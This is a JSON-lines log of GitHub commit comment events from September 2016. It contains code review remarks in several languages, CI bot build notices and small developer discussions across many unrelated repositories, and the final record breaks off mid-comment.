{"id":"4622716032","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":19186825,"position":null,"line":null,"path":null,"commit_id":"2a18043fdc3d9712a69a09ba87c7ae3534c3eab7","created_at":"2016-09-27T08:35:56Z","updated_at":"2016-09-27T08:35:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#eiUNuHitRvyNVCStn15ykQ"}},"created_at":"2016-09-27T08:35:56Z"}
{"id":"4622718990","type":"CommitCommentEvent","actor":{"login":"marx99"},"repo":{"name":"marx99/first"},"payload":{"comment":{"id":19186833,"position":null,"line":null,"path":null,"commit_id":"450beb5c28c772b18038f32237e305183ce6bc03","created_at":"2016-09-27T08:36:33Z","updated_at":"2016-09-27T08:36:33Z","body":"经典技术书籍收藏，主要python"}},"created_at":"2016-09-27T08:36:33Z"}
{"id":"4622719787","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186835,"position":6,"line":6,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.h","commit_id":"42428b98da9e42b678b7486c8f082566f291345b","created_at":"2016-09-27T08:36:42Z","updated_at":"2016-09-27T08:36:42Z","body":"Почему строчка передается по значению? В соответствии с последним стандартом C++ копирование строки - это операция порядка O(n)."}},"created_at":"2016-09-27T08:36:42Z"}
{"id":"4622722944","type":"CommitCommentEvent","actor":{"login":"jochenberger"},"repo":{"name":"geb/geb"},"payload":{"comment":{"id":19186845,"position":null,"line":null,"path":null,"commit_id":"51a58bba7454ba7f7b9cfda1f9b2e26e8e4793d2","created_at":"2016-09-27T08:37:22Z","updated_at":"2016-09-27T08:37:22Z","body":"Would it be possible to delegate to the `FormElement` module methods from `NonEmptyNavigator#propertyMissing` or mix in the module automatically? That would make `$('input').enabled` work in 1.0. Or should this explicitly not work anymore?"}},"created_at":"2016-09-27T08:37:22Z"}
{"id":"4622723059","type":"CommitCommentEvent","actor":{"login":"dysonance"},"repo":{"name":"dysonance/Indicators.jl"},"payload":{"comment":{"id":19186846,"position":5,"line":6,"path":".travis.yml","commit_id":"2131c08307f01f17542321a315e20aa21931f65c","created_at":"2016-09-27T08:37:23Z","updated_at":"2016-09-27T08:37:23Z","body":"Ahh, my bad. I made the changes so it should be good to go now. Sorry again for my Git noobishness :)"}},"created_at":"2016-09-27T08:37:23Z"}
{"id":"4622723170","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186848,"position":27,"line":18,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.h","commit_id":"0e1753a5360f698ef4265a5fd76c48e49bbca18c","created_at":"2016-09-27T08:37:24Z","updated_at":"2016-09-27T08:37:24Z","body":"Опять все параметры передаются по значению"}},"created_at":"2016-09-27T08:37:24Z"}
{"id":"4622723345","type":"CommitCommentEvent","actor":{"login":"choroba"},"repo":{"name":"tupinek/Acme-CPANAuthors-Czech"},"payload":{"comment":{"id":19186850,"position":null,"line":null,"path":null,"commit_id":"f78a2851b08b6ad5a9cef0767c682c5073b34ca3","created_at":"2016-09-27T08:37:27Z","updated_at":"2016-09-27T08:37:27Z","body":"Please, don't do this. `E.` is the correct value, I use `Egon` on facebook only, as it says `first name too short` for `E` and `too many punctuation characters` for `E.`"}},"created_at":"2016-09-27T08:37:27Z"}
{"id":"4622724304","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186852,"position":35,"line":48,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:37:39Z","updated_at":"2016-09-27T08:37:39Z","body":"Why does `dob` result in a _weeks-since_ value?  I'd expect it to be the most precise option, and therefore return a value in days."}},"created_at":"2016-09-27T08:37:39Z"}
{"id":"4622728455","type":"CommitCommentEvent","actor":{"login":"pennam"},"repo":{"name":"ThrowTheSwitch/Ceedling"},"payload":{"comment":{"id":19186861,"position":null,"line":null,"path":null,"commit_id":"61b3db601b8caf4e36145638a811e9f856cf6c76","created_at":"2016-09-27T08:38:25Z","updated_at":"2016-09-27T08:38:25Z","body":"so, i've made a some steps:\r\nrenamed gcovr scrpt into gcovr.py\r\nAdded python to system path\r\nAdded gcovr.py to system path\r\nNow if i call gcovr.py from cmd i see proper output\r\nI've also changed into defaults.yml from\r\n`:executable: gcovr`\r\nto \r\n`:executable: gcovr.py`\r\nThen i call rake utils:gcov and i can see \r\n`\"Creating html report of gcov results...\" `\r\noutput but...\r\nthen it stops with the following error:\r\n`rake aborted!`\r\n`Errno::ENOENT: No such file or directory - gcovr.py -p -b -e '^vendor.*|^build.*|^test.*|^lib.*'--html-r .-o GcovCoverageResults.html`\r\n\r\nI'm quite sure it depends on my windows environment but i have no idea how to fix it. Any hint?\r\n "}},"created_at":"2016-09-27T08:38:25Z"}
{"id":"4622729603","type":"CommitCommentEvent","actor":{"login":"zapelin"},"repo":{"name":"zapelin/collab-github"},"payload":{"comment":{"id":19186863,"position":null,"line":null,"path":null,"commit_id":"8527e13f79fcb8e8c73f88c4b3331a9078a5cb35","created_at":"2016-09-27T08:38:40Z","updated_at":"2016-09-27T08:38:40Z","body":"Collaborator:\nA review for this commit was created. [Link to review](http://localhost:8080/ui#review:id=1062)"}},"created_at":"2016-09-27T08:38:40Z"}
{"id":"4622730410","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186864,"position":23,"line":21,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon.cpp","commit_id":"489c65cc26f194b50cb1315e597452912d822c84","created_at":"2016-09-27T08:38:51Z","updated_at":"2016-09-27T08:38:51Z","body":"не инициализированная переменная"}},"created_at":"2016-09-27T08:38:51Z"}
{"id":"4622730490","type":"CommitCommentEvent","actor":{"login":"kiyanwang"},"repo":{"name":"talis/tripod-php"},"payload":{"comment":{"id":19186865,"position":103,"line":1815,"path":"src/mongo/Config.class.php","commit_id":"1e6b05d31d2cfd33a9f3d478cc2c3a93417b64bb","created_at":"2016-09-27T08:38:52Z","updated_at":"2016-09-27T08:38:52Z","body":"if this is not documented can you rely on it ?"}},"created_at":"2016-09-27T08:38:52Z"}
{"id":"4622730559","type":"CommitCommentEvent","actor":{"login":"vanzaj"},"repo":{"name":"vanzaj/yoda_this"},"payload":{"comment":{"id":19186866,"position":1,"line":1,"path":"yoda.py","commit_id":"1aef513beeaaec0da085403ea76ebaf8fbdf85c6","created_at":"2016-09-27T08:38:52Z","updated_at":"2016-09-27T08:38:52Z","body":"That would mean big departure from the Source."}},"created_at":"2016-09-27T08:38:52Z"}
{"id":"4622732752","type":"CommitCommentEvent","actor":{"login":"ElPumpo"},"repo":{"name":"ElPumpo/Win10Clean"},"payload":{"comment":{"id":19186870,"position":null,"line":null,"path":null,"commit_id":"433da21d71ca600d63d67a18d5bea5bc47e3de2f","created_at":"2016-09-27T08:39:19Z","updated_at":"2016-09-27T08:39:19Z","body":"The text in the textbox should not be spaced manually, instead let the entire text size to window on its own or else other resolutions will see unnecessary spaces."}},"created_at":"2016-09-27T08:39:19Z"}
{"id":"4622735469","type":"CommitCommentEvent","actor":{"login":"Konaari"},"repo":{"name":"Konaari/faluuja"},"payload":{"comment":{"id":19186879,"position":null,"line":null,"path":null,"commit_id":"8e8d6c6986c324ea046b1a7a27435e873da28c53","created_at":"2016-09-27T08:39:53Z","updated_at":"2016-09-27T08:39:53Z","body":"# hello_world\r\nHi friends\r\nits good to be rich\r\nits good to be strong\r\n\r\n"}},"created_at":"2016-09-27T08:39:53Z"}
{"id":"4622738621","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186886,"position":null,"line":null,"path":null,"commit_id":"f898a6aa48335fe3fe44ddd8977b80d25a3030af","created_at":"2016-09-27T08:40:29Z","updated_at":"2016-09-27T08:40:29Z","body":"Раз уж вы закоммитили test.txt, то хорошо написать на нём простенький unit test"}},"created_at":"2016-09-27T08:40:29Z"}
{"id":"4622739775","type":"CommitCommentEvent","actor":{"login":"kiyanwang"},"repo":{"name":"talis/tripod-php"},"payload":{"comment":{"id":19186887,"position":65,"line":1783,"path":"src/mongo/Config.class.php","commit_id":"1e6b05d31d2cfd33a9f3d478cc2c3a93417b64bb","created_at":"2016-09-27T08:40:44Z","updated_at":"2016-09-27T08:40:44Z","body":"you dont want to flood the server with pings ?"}},"created_at":"2016-09-27T08:40:44Z"}
{"id":"4622741440","type":"CommitCommentEvent","actor":{"login":"mirthestam"},"repo":{"name":"DefinitelyTyped/DefinitelyTyped"},"payload":{"comment":{"id":19186893,"position":null,"line":null,"path":null,"commit_id":"1e92c152ee1b7af9b39f01789de37e2e463fd0de","created_at":"2016-09-27T08:41:05Z","updated_at":"2016-09-27T08:41:05Z","body":"@andy-ms  I would be happy to. I just do not feel comfortable enough with TypeScript and Typings as I am just migrating from .NET. It could be easy to just re-add the method using PR. However, I am unaware of other issues that might have been introduced by this change. Therefore it would really be helpful if @frogcjn could answer this question asked by @jdbriaris: \"Is this intentional?\" to know the reasoning behind this change."}},"created_at":"2016-09-27T08:41:05Z"}
{"id":"4622741547","type":"CommitCommentEvent","actor":{"login":"paland3"},"repo":{"name":"husdo/wordBullsCows"},"payload":{"comment":{"id":19186894,"position":null,"line":null,"path":null,"commit_id":"e1b3cc07d11c08b4c01ade5b1807afdc40068371","created_at":"2016-09-27T08:41:07Z","updated_at":"2016-09-27T08:41:07Z","body":"cool"}},"created_at":"2016-09-27T08:41:07Z"}
{"id":"4622746179","type":"CommitCommentEvent","actor":{"login":"aminmc"},"repo":{"name":"hmrc/time-to-pay-arrangement"},"payload":{"comment":{"id":19186910,"position":5,"line":9,"path":"build.gradle","commit_id":"1da1e06b93524ae94844d4b24da2ce710f9f8d6c","created_at":"2016-09-27T08:42:04Z","updated_at":"2016-09-27T08:42:04Z","body":"You don't need the jcenter.bintray.com. it's already at the top."}},"created_at":"2016-09-27T08:42:04Z"}
{"id":"4622748848","type":"CommitCommentEvent","actor":{"login":"erdi"},"repo":{"name":"geb/geb"},"payload":{"comment":{"id":19186918,"position":null,"line":null,"path":null,"commit_id":"51a58bba7454ba7f7b9cfda1f9b2e26e8e4793d2","created_at":"2016-09-27T08:42:37Z","updated_at":"2016-09-27T08:42:37Z","body":"This explicitly should not work anymore - the `disabled`/`enabled`, `readOnly`/`editable` attributes don't exists on anything that is not a form element hence they have been deprecated and then removed from `Navigator`"}},"created_at":"2016-09-27T08:42:37Z"}
{"id":"4622749824","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186920,"position":25,"line":51,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"d688b5e37f6f2261ffe38d270a48a1facc8d5920","created_at":"2016-09-27T08:42:49Z","updated_at":"2016-09-27T08:42:49Z","body":"Такие штуки лучше делать картами unordered_map<enum, string> converter. Тогда код выглядеть будет так: resultStream << converter[keyWordIt->second];"}},"created_at":"2016-09-27T08:42:49Z"}
{"id":"4622750664","type":"CommitCommentEvent","actor":{"login":"WeiLiving"},"repo":{"name":"WeiLiving/1603Test"},"payload":{"comment":{"id":19186923,"position":null,"line":null,"path":null,"commit_id":"6875664fc109a9dea2c7bd467b4824badd5b8b23","created_at":"2016-09-27T08:42:58Z","updated_at":"2016-09-27T08:42:58Z","body":"dsfgrfg"}},"created_at":"2016-09-27T08:42:58Z"}
{"id":"4622750695","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186924,"position":1,"line":1,"path":"class_1/ps_1_1.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:42:59Z","updated_at":"2016-09-27T08:42:59Z","body":"lines 1-3: variable names are not the best choice\r\nI would  name it: soup, pasta, special"}},"created_at":"2016-09-27T08:42:59Z"}
{"id":"4622751900","type":"CommitCommentEvent","actor":{"login":"Alucard24"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19186926,"position":null,"line":null,"path":null,"commit_id":"34f81a8c6361873dbf37a27bc7125673d4403dc0","created_at":"2016-09-27T08:43:14Z","updated_at":"2016-09-27T08:43:14Z","body":"1 bug that I found is:\r\nWhen I am on call, and screen become black..... it doesn't turn on when I move my phone away from my ear. I have to press power button to turn the screen on.\r\nI need to found what break this functionality."}},"created_at":"2016-09-27T08:43:14Z"}
{"id":"4622754833","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186932,"position":28,"line":54,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"d688b5e37f6f2261ffe38d270a48a1facc8d5920","created_at":"2016-09-27T08:43:50Z","updated_at":"2016-09-27T08:43:50Z","body":"в case мы обязательно добавляем default: assert( false ); Чтобы ловить ситуации, когда приходит неожидаемое значение"}},"created_at":"2016-09-27T08:43:50Z"}
{"id":"4622757523","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186938,"position":4,"line":4,"path":"class_1/ps_1_1.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:44:25Z","updated_at":"2016-09-27T08:44:25Z","body":"Please take a look: https://pyformat.info/\r\n.format is preferred way to construct strings in Python "}},"created_at":"2016-09-27T08:44:25Z"}
{"id":"4622757574","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"ValeriyKnyazhev/ModuleHighlightingAndAutoCompleteon"},"payload":{"comment":{"id":19186939,"position":10,"line":17,"path":"ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutoCompleteon/ModuleHighlightingAndAutocomplete.cpp","commit_id":"3db797aaf078139a1009f55a9e545111af4e62d5","created_at":"2016-09-27T08:44:25Z","updated_at":"2016-09-27T08:44:25Z","body":"Вы смогли =))"}},"created_at":"2016-09-27T08:44:25Z"}
{"id":"4622758662","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186943,"position":21,"line":37,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:44:39Z","updated_at":"2016-09-27T08:44:39Z","body":"It looks like `isNaN()` is the right one to use. I'll change it."}},"created_at":"2016-09-27T08:44:39Z"}
{"id":"4622759736","type":"CommitCommentEvent","actor":{"login":"a0119754"},"repo":{"name":"a0119754/CS3210Assignment"},"payload":{"comment":{"id":19186946,"position":null,"line":null,"path":null,"commit_id":"751e58dec1800ce9660800b2a1f015ee845c9b05","created_at":"2016-09-27T08:44:50Z","updated_at":"2016-09-27T08:44:50Z","body":"Holy shit, this stupid little thing actually improved the timings by a lot!\r\n\r\nResults of sequential:\r\n0.68, 0.65, 0.65 (average: 0.66)\r\n\r\nResults of original:\r\nCPU: 5.93, 5.57, 5.62 (average: 5.706666667)\r\nGPU: 12.83, 12.82, 12.82 (average: 12.82333333)\r\n\r\nResults now:\r\nCPU: 3.46, 5.71, 3.49 (4.22)\r\nGPU: 4.17, 4.2, 4.19 (4.18666666666667)"}},"created_at":"2016-09-27T08:44:50Z"}
{"id":"4622760442","type":"CommitCommentEvent","actor":{"login":"pagie"},"repo":{"name":"UoSCGP/demo_repos"},"payload":{"comment":{"id":19186947,"position":null,"line":null,"path":null,"commit_id":"1ffaff55309fca5c7ea166bd9d60e44c5f06cbfb","created_at":"2016-09-27T08:45:00Z","updated_at":"2016-09-27T08:45:00Z","body":"winning!"}},"created_at":"2016-09-27T08:45:00Z"}
{"id":"4622762862","type":"CommitCommentEvent","actor":{"login":"Yakhont"},"repo":{"name":"Yakhont/cs178"},"payload":{"comment":{"id":19186950,"position":null,"line":null,"path":null,"commit_id":"69c201d483a6a5b4422bc34bea3597bdc1e567ad","created_at":"2016-09-27T08:45:30Z","updated_at":"2016-09-27T08:45:30Z","body":"public class HelloWorld {\r\n\r\n    public static void main(String[] args) {\r\n        // The prog prints \"Hello, World!\" to the terminal\r\n        System.out.println(\"Hello, World!\");\r\n    }\r\n\r\n}"}},"created_at":"2016-09-27T08:45:30Z"}
{"id":"4622763533","type":"CommitCommentEvent","actor":{"login":"Superberti"},"repo":{"name":"raspberrypi/linux"},"payload":{"comment":{"id":19186953,"position":null,"line":null,"path":null,"commit_id":"95cb7e4de59547506de4b669448e11381ec4abfe","created_at":"2016-09-27T08:45:37Z","updated_at":"2016-09-27T08:45:37Z","body":"Hi again,\r\n\r\nIn my observations the autodetecting just worked fine. On the driver start it looks for some time on the input pin and decides then if it is an active low or active high receiver. \r\nNormally there should be no IR signal at all when the raspi boots and so the detecting function should work just fine as it is.\r\n\r\nI think, removing the patch and removing the line 'sense = sense ? 0 : 1;' is the best we can do here. And if the autodetecting really fails, the driver could be configured manually, too.\r\n\r\nBye,\r\nOliver\r\n"}},"created_at":"2016-09-27T08:45:37Z"}
{"id":"4622764459","type":"CommitCommentEvent","actor":{"login":"Yakhont"},"repo":{"name":"Yakhont/cs178"},"payload":{"comment":{"id":19186955,"position":null,"line":null,"path":null,"commit_id":"69c201d483a6a5b4422bc34bea3597bdc1e567ad","created_at":"2016-09-27T08:45:50Z","updated_at":"2016-09-27T08:45:50Z","body":"Hello World"}},"created_at":"2016-09-27T08:45:50Z"}
{"id":"4622765138","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186956,"position":8,"line":8,"path":"class_1/ps_1_2.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:45:58Z","updated_at":"2016-09-27T08:45:58Z","body":"please convert to for loop: for i in range(0, 13)\r\nIn this case you can remove lines 7 and 16"}},"created_at":"2016-09-27T08:45:58Z"}
{"id":"4622765289","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19186957,"position":null,"line":null,"path":null,"commit_id":"fc8b54ec86c17f9e634cc4c1c568abcdc975c6c7","created_at":"2016-09-27T08:46:01Z","updated_at":"2016-09-27T08:46:01Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1167](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14279&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:13:30"}},"created_at":"2016-09-27T08:46:01Z"}
{"id":"4622768373","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186961,"position":35,"line":48,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:46:35Z","updated_at":"2016-09-27T08:46:35Z","body":"I expected it to return a date value, not a number of weeks or days in an integer. I just copied the original fields. I certainly wouldn't want to break anyone's production instance by changing dob from number of weeks to number of days..."}},"created_at":"2016-09-27T08:46:35Z"}
{"id":"4622768966","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186964,"position":1,"line":1,"path":"class_1/ps_1_2.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:46:41Z","updated_at":"2016-09-27T08:46:41Z","body":"looks good to me"}},"created_at":"2016-09-27T08:46:41Z"}
{"id":"4622770740","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186966,"position":8,"line":8,"path":"class_1/ps_1_3.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:46:59Z","updated_at":"2016-09-27T08:46:59Z","body":"please convert to for loop"}},"created_at":"2016-09-27T08:46:59Z"}
{"id":"4622771515","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19186969,"position":39,"line":39,"path":"footparse/eloratings.py","commit_id":"489e0bb4cfe0cc4d3edb8579ba6f160cf27976a4","created_at":"2016-09-27T08:47:08Z","updated_at":"2016-09-27T08:47:08Z","body":"Isn't `attr` too general and vague ? We could try to be more precise: `rating`, `team`, `team_rating` ?"}},"created_at":"2016-09-27T08:47:08Z"}
{"id":"4622774103","type":"CommitCommentEvent","actor":{"login":"Ylambers"},"repo":{"name":"Jonellvl/schoolclash_app"},"payload":{"comment":{"id":19186976,"position":null,"line":null,"path":null,"commit_id":"e9a192da46c2357af76f980b9d80d3ad30f88dc6","created_at":"2016-09-27T08:47:39Z","updated_at":"2016-09-27T08:47:39Z","body":"Nice commit :)"}},"created_at":"2016-09-27T08:47:39Z"}
{"id":"4622774887","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186978,"position":35,"line":48,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:47:47Z","updated_at":"2016-09-27T08:47:47Z","body":"Perhaps worth an inline comment, then?"}},"created_at":"2016-09-27T08:47:47Z"}
{"id":"4622775069","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19186979,"position":20,"line":20,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T08:47:49Z","updated_at":"2016-09-27T08:47:49Z","body":"Почему параметры передаются по указателю, а не по ссылке? Передача 0 в качестве аргумента свалит вашу программу с AV"}},"created_at":"2016-09-27T08:47:49Z"}
{"id":"4622775134","type":"CommitCommentEvent","actor":{"login":"connormclaud"},"repo":{"name":"NinaRybchak/python_classes"},"payload":{"comment":{"id":19186980,"position":1,"line":1,"path":"class_1/ps_1_3.py","commit_id":"5d0dc653421921ebe88abfb39dcc337369eaca64","created_at":"2016-09-27T08:47:51Z","updated_at":"2016-09-27T08:47:51Z","body":"looks good to me"}},"created_at":"2016-09-27T08:47:51Z"}
{"id":"4622775888","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19186981,"position":null,"line":null,"path":null,"commit_id":"ba1802f187f35145c584a4f9ee81a5b0c3c83b1f","created_at":"2016-09-27T08:47:59Z","updated_at":"2016-09-27T08:47:59Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1168](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14282&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-27T08:47:59Z"}
{"id":"4622779074","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19186988,"position":null,"line":null,"path":null,"commit_id":"f44e3e1856fc480049423f99fccc4ac2b09fcf7e","created_at":"2016-09-27T08:48:37Z","updated_at":"2016-09-27T08:48:37Z","body":"I don't mind this, but just as a small comment: those are PyCharm / Mac specific, and related to your particular setup - not really part of the footparse library itself. For this, it might be convenient to use a system-wide `.gitignore`: <http://stackoverflow.com/a/22885996/1254798>\r\n\r\nI have such a file where I ignore e.g. vim swap files, .DS_STORE, etc. :-)"}},"created_at":"2016-09-27T08:48:37Z"}
{"id":"4622779486","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-sentinel"},"payload":{"comment":{"id":19186991,"position":21,"line":37,"path":"transitions/registration.js","commit_id":"36fe7f2e6e85c8ab9de49045943d4c2fda16ca77","created_at":"2016-09-27T08:48:42Z","updated_at":"2016-09-27T08:48:42Z","body":"Sorry to bring this up!  I just had a quick read of https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/isNaN and am more confused than ever.  Hopefully your intention will be clear when using global `isNaN()` ;)"}},"created_at":"2016-09-27T08:48:42Z"}
{"id":"4622780389","type":"CommitCommentEvent","actor":{"login":"NOTonike005"},"repo":{"name":"onike005/Timo-s-project"},"payload":{"comment":{"id":19186996,"position":10,"line":23,"path":"README.md","commit_id":"2c9ba86a1340ce9e681784ea1197934e1ee100de","created_at":"2016-09-27T08:48:53Z","updated_at":"2016-09-27T08:48:53Z","body":"This is stupid text!"}},"created_at":"2016-09-27T08:48:53Z"}
{"id":"4622781425","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19186998,"position":22,"line":22,"path":"formulas-converter/formulas-converter/CSintacticValidationVisitor.cpp","commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T08:49:05Z","updated_at":"2016-09-27T08:49:05Z","body":"reinterptret_cast - слишком сильное преобразование. Оно не содержит никакой информации о типе. Здесь нужен dynamic_cast или static_cast"}},"created_at":"2016-09-27T08:49:05Z"}
{"id":"4622783075","type":"CommitCommentEvent","actor":{"login":"MatthiasDelecluyse"},"repo":{"name":"MatthiasDelecluyse/MI1"},"payload":{"comment":{"id":19187004,"position":null,"line":null,"path":null,"commit_id":"de06cf15ac97897bf256629841cb4103d9a222bd","created_at":"2016-09-27T08:49:23Z","updated_at":"2016-09-27T08:49:23Z","body":"Les2"}},"created_at":"2016-09-27T08:49:23Z"}
{"id":"4622783441","type":"CommitCommentEvent","actor":{"login":"victorkristof"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19187005,"position":91,"line":91,"path":"footparse/eloratings.py","commit_id":"489e0bb4cfe0cc4d3edb8579ba6f160cf27976a4","created_at":"2016-09-27T08:49:28Z","updated_at":"2016-09-27T08:49:28Z","body":"Same comment as line 39"}},"created_at":"2016-09-27T08:49:28Z"}
{"id":"4622784918","type":"CommitCommentEvent","actor":{"login":"Evelyn88"},"repo":{"name":"Evelyn88/android-jobs"},"payload":{"comment":{"id":19187006,"position":null,"line":null,"path":null,"commit_id":"f6cf064cd68f7f65fdf100fe04da2162647f9c6e","created_at":"2016-09-27T08:49:46Z","updated_at":"2016-09-27T08:49:46Z","body":"Add Teambition 高级 Android 工程师"}},"created_at":"2016-09-27T08:49:46Z"}
{"id":"4622786499","type":"CommitCommentEvent","actor":{"login":"hnyman"},"repo":{"name":"diizzyy/packages"},"payload":{"comment":{"id":19187012,"position":5,"line":12,"path":"kernel/exfat-nofuse/Makefile","commit_id":"55a9569712930bc2b4fd0c14ba1fa8cda6dcf643","created_at":"2016-09-27T08:50:03Z","updated_at":"2016-09-27T08:50:03Z","body":"You try to use PKG_SOURCE_VERSION before you have defined it. That leads into different files names than intended:\r\n``` dl/exfat-nofuse-2016-09-26-.tar.bz2 ```"}},"created_at":"2016-09-27T08:50:03Z"}
{"id":"4622786516","type":"CommitCommentEvent","actor":{"login":"lucasmaystre"},"repo":{"name":"kickoffai/footparse"},"payload":{"comment":{"id":19187013,"position":5,"line":5,"path":"footparse/fifa.py","commit_id":"b6d4c869b304ae80d57cb31c4750d2ab9edbe67b","created_at":"2016-09-27T08:50:04Z","updated_at":"2016-09-27T08:50:04Z","body":"I would rather call it \"RankingPage\" - maybe someday we'll really want to scrape something from the fifa.com homepage!"}},"created_at":"2016-09-27T08:50:04Z"}
{"id":"4622786816","type":"CommitCommentEvent","actor":{"login":"fantomius"},"repo":{"name":"Izeren/math-redactor"},"payload":{"comment":{"id":19187015,"position":null,"line":null,"path":null,"commit_id":"fd51c966fb03316ff377eb405502afff33f79d4a","created_at":"2016-09-27T08:50:08Z","updated_at":"2016-09-27T08:50:08Z","body":"Вам нужно прочитать что такое RAII, unique_ptr и shared_ptr. И применить знания на практике"}},"created_at":"2016-09-27T08:50:08Z"}
{"id":"4622787272","type":"CommitCommentEvent","actor":{"login":"Minimata"},"repo":{"name":"Minimata/WebGl"},"payload":{"comment":{"id":19187018,"position":122,"line":120,"path":"squelette/js/ch04-05_BlueTriangles.js","commit_id":"99f70520a9610459e3e74590a12fd523a0a07952","created_at":"2016-09-27T08:50:13Z","updated_at":"2016-09-27T08:50:13Z","body":"Nice article, cool to read.\r\n\r\nI didn't think about the minifier at all, the \"missing\" semi-colon wasn't a choice, just forgetfulness.\r\nI'm using semi-colons because I started coding in c++, I just got used to it.\r\nI put a semi-colon back there because of this habit.\r\n\r\nAlso, WebStorm highlights the code with a warning saying there's a semi-colon missing (if the statement is not the last of a block). And I like WebStorm, and don't like warnings.\r\n\r\nFinally, even if I can perfectly understand not using semi-colons, this would have to be consistent. I can be consistent by putting semi-colons everywhere even if it's not needed 99% of the time and even if it means I'm not as lazy as I could be.\r\nBy not putting semi-colons at the end of statement, as said in the article, you could possibly have to do that `;(d + e).print()` to stay consistent. This, I'm really not used to (looks ugly to me), and I think this is a lot to pay 